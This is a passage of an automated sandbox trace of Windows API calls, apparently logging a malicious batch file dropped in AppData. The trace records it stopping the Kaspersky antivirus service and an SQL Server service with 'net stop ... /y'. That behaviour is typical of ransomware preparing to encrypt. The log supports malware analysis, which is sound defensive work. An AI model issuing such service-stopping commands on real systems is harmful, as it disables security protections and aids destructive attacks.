lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0213.619] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0213.619] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop AVP /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop AVP /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop AVP /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xab0, dwThreadId=0xafc)) returned 1 [0213.623] CloseHandle (hObject=0x78) returned 1 [0213.623] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0213.623] GetProcessHeap () returned 0x3e0000 [0213.623] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0213.623] GetEnvironmentStringsW () returned 0x3f8408* [0213.623] GetProcessHeap () returned 0x3e0000 [0213.623] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0213.624] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0213.624] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0213.758] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0213.758] CloseHandle (hObject=0x74) returned 1 [0213.758] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0213.758] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0213.758] GetProcessHeap () returned 0x3e0000 [0213.758] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0213.758] GetEnvironmentStringsW () returned 0x3f8408* [0213.758] GetProcessHeap () returned 0x3e0000 [0213.758] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0213.759] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0213.759] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0213.759] GetProcessHeap () returned 0x3e0000 [0213.759] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0213.759] GetEnvironmentStringsW () returned 0x3f8408* [0213.759] GetProcessHeap () returned 0x3e0000 [0213.759] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0213.759] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0213.760] GetProcessHeap () returned 0x3e0000 [0213.760] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0213.760] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0213.760] _get_osfhandle (_FileHandle=1) returned 0x264 [0213.760] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0213.760] _get_osfhandle (_FileHandle=1) returned 0x264 [0213.760] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0213.760] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0213.760] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0213.760] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0213.760] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0213.760] SetConsoleInputExeNameW () returned 0x1 [0213.761] GetConsoleOutputCP () returned 0x1b5 [0213.761] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0213.761] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.761] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0213.761] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0213.761] _get_osfhandle (_FileHandle=3) returned 0x74 [0213.761] SetFilePointer (in: hFile=0x74, lDistanceToMove=5377, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1501 [0213.761] GetProcessHeap () returned 0x3e0000 [0213.761] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0213.761] GetProcessHeap () returned 0x3e0000 [0213.761] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0213.761] GetProcessHeap () returned 0x3e0000 [0213.761] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0213.761] GetProcessHeap () returned 0x3e0000 [0213.761] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0213.761] GetProcessHeap () returned 0x3e0000 [0213.761] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0213.761] GetProcessHeap () returned 0x3e0000 [0213.761] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0213.761] GetProcessHeap () returned 0x3e0000 [0213.761] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0213.762] GetProcessHeap () returned 0x3e0000 [0213.762] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0213.762] GetProcessHeap () returned 0x3e0000 [0213.762] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0213.762] GetProcessHeap () returned 0x3e0000 [0213.762] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0213.762] GetProcessHeap () returned 0x3e0000 [0213.762] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0213.762] GetProcessHeap () returned 0x3e0000 [0213.762] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0213.762] GetProcessHeap () returned 0x3e0000 [0213.762] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0213.762] _get_osfhandle (_FileHandle=3) returned 0x74 [0213.762] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1501 [0213.762] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x3c0, lpOverlapped=0x0) returned 1 [0213.762] SetFilePointer (in: hFile=0x74, lDistanceToMove=5406, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x151e [0213.762] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=29, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQLFDLauncher /y\r\nT /y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 29 [0213.762] _get_osfhandle (_FileHandle=3) returned 0x74 [0213.762] GetFileType (hFile=0x74) returned 0x1 [0213.763] _get_osfhandle (_FileHandle=3) returned 0x74 [0213.763] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x151e [0213.763] GetProcessHeap () returned 0x3e0000 [0213.763] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0213.763] GetProcessHeap () returned 0x3e0000 [0213.763] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0213.766] _tell (_FileHandle=3) returned 5406 [0213.766] _close (_FileHandle=3) returned 0 [0213.766] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0213.766] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0213.766] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0213.766] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0213.766] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0213.766] _wcsicmp (_String1="net", _String2="CD") returned 11 [0213.766] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0213.766] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0213.766] _wcsicmp (_String1="net", _String2="REN") returned -4 [0213.766] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0213.766] _wcsicmp (_String1="net", _String2="SET") returned -5 [0213.766] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0213.767] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0213.767] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0213.767] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0213.767] _wcsicmp (_String1="net", _String2="MD") returned 1 [0213.767] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0213.767] _wcsicmp (_String1="net", _String2="RD") returned -4 [0213.767] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0213.767] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0213.767] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0213.767] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0213.767] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0213.767] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0213.767] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0213.767] _wcsicmp (_String1="net", _String2="VER") returned -8 [0213.767] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0213.767] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0213.767] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0213.767] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0213.767] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0213.767] _wcsicmp (_String1="net", _String2="START") returned -5 [0213.767] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0213.767] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0213.767] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0213.767] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0213.767] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0213.767] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0213.767] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0213.767] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0213.767] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0213.767] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0213.768] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0213.768] SetErrorMode (uMode=0x0) returned 0x1 [0213.768] GetProcessHeap () returned 0x3e0000 [0213.768] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0213.768] GetProcessHeap () returned 0x3e0000 [0213.768] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0213.768] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0213.768] GetProcessHeap () returned 0x3e0000 [0213.768] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0213.768] GetProcessHeap () returned 0x3e0000 [0213.768] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0213.769] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0213.769] GetProcessHeap () returned 0x3e0000 [0213.769] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0213.769] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.769] GetProcessHeap () returned 0x3e0000 [0213.769] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0213.769] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0213.769] GetProcessHeap () returned 0x3e0000 [0213.769] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0213.770] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.770] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0213.770] GetLastError () returned 0x2 [0213.771] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0213.771] GetLastError () returned 0x2 [0213.771] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.772] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0213.772] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0213.772] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0213.772] GetLastError () returned 0x2 [0213.773] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0213.773] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0213.773] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.774] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0213.774] SetErrorMode (uMode=0x0) returned 0x1 [0213.774] GetProcessHeap () returned 0x3e0000 [0213.774] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0213.774] GetProcessHeap () returned 0x3e0000 [0213.774] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0213.774] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0213.774] GetProcessHeap () returned 0x3e0000 [0213.774] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0213.774] GetProcessHeap () returned 0x3e0000 [0213.774] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0213.775] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0213.775] GetProcessHeap () returned 0x3e0000 [0213.775] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0213.775] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.775] GetProcessHeap () returned 0x3e0000 [0213.775] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0213.775] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0213.775] GetProcessHeap () returned 0x3e0000 [0213.775] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0213.776] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.776] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0213.776] GetLastError () returned 0x2 [0213.777] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0213.777] GetLastError () returned 0x2 [0213.777] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.777] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0213.778] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0213.778] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0213.778] GetLastError () returned 0x2 [0213.778] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0213.779] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0213.779] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.779] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0213.779] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0213.779] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0213.780] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0213.780] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQLFDLauncher /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQLFDLauncher /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQLFDLauncher /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xb68, dwThreadId=0xb64)) returned 1 [0213.784] CloseHandle (hObject=0x74) returned 1 [0213.784] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0213.784] GetProcessHeap () returned 0x3e0000 [0213.784] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0213.784] GetEnvironmentStringsW () returned 0x3f8408* [0213.784] GetProcessHeap () returned 0x3e0000 [0213.784] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0213.784] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0213.784] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0214.037] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0214.037] CloseHandle (hObject=0x78) returned 1 [0214.037] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0214.037] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0214.037] GetProcessHeap () returned 0x3e0000 [0214.037] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.037] GetEnvironmentStringsW () returned 0x3f8408* [0214.037] GetProcessHeap () returned 0x3e0000 [0214.037] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.038] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.038] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.038] GetProcessHeap () returned 0x3e0000 [0214.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.038] GetEnvironmentStringsW () returned 0x3f8408* [0214.038] GetProcessHeap () returned 0x3e0000 [0214.038] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.038] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.038] GetProcessHeap () returned 0x3e0000 [0214.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0214.038] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0214.038] _get_osfhandle (_FileHandle=1) returned 0x264 [0214.038] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0214.038] _get_osfhandle (_FileHandle=1) returned 0x264 [0214.038] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0214.038] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0214.038] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0214.039] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0214.039] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0214.039] SetConsoleInputExeNameW () returned 0x1 [0214.039] GetConsoleOutputCP () returned 0x1b5 [0214.039] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0214.039] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0214.040] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0214.040] _get_osfhandle (_FileHandle=3) returned 0x78 [0214.040] SetFilePointer (in: hFile=0x78, lDistanceToMove=5406, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x151e [0214.040] GetProcessHeap () returned 0x3e0000 [0214.040] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0214.040] GetProcessHeap () returned 0x3e0000 [0214.040] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0214.040] GetProcessHeap () returned 0x3e0000 [0214.040] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0214.040] GetProcessHeap () returned 0x3e0000 [0214.040] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0214.040] GetProcessHeap () returned 0x3e0000 [0214.040] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0214.040] GetProcessHeap () returned 0x3e0000 [0214.040] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0214.040] GetProcessHeap () returned 0x3e0000 [0214.040] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0214.040] GetProcessHeap () returned 0x3e0000 [0214.040] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0214.040] GetProcessHeap () returned 0x3e0000 [0214.040] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0214.040] GetProcessHeap () returned 0x3e0000 [0214.040] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0214.040] GetProcessHeap () returned 0x3e0000 [0214.040] HeapFree (in: 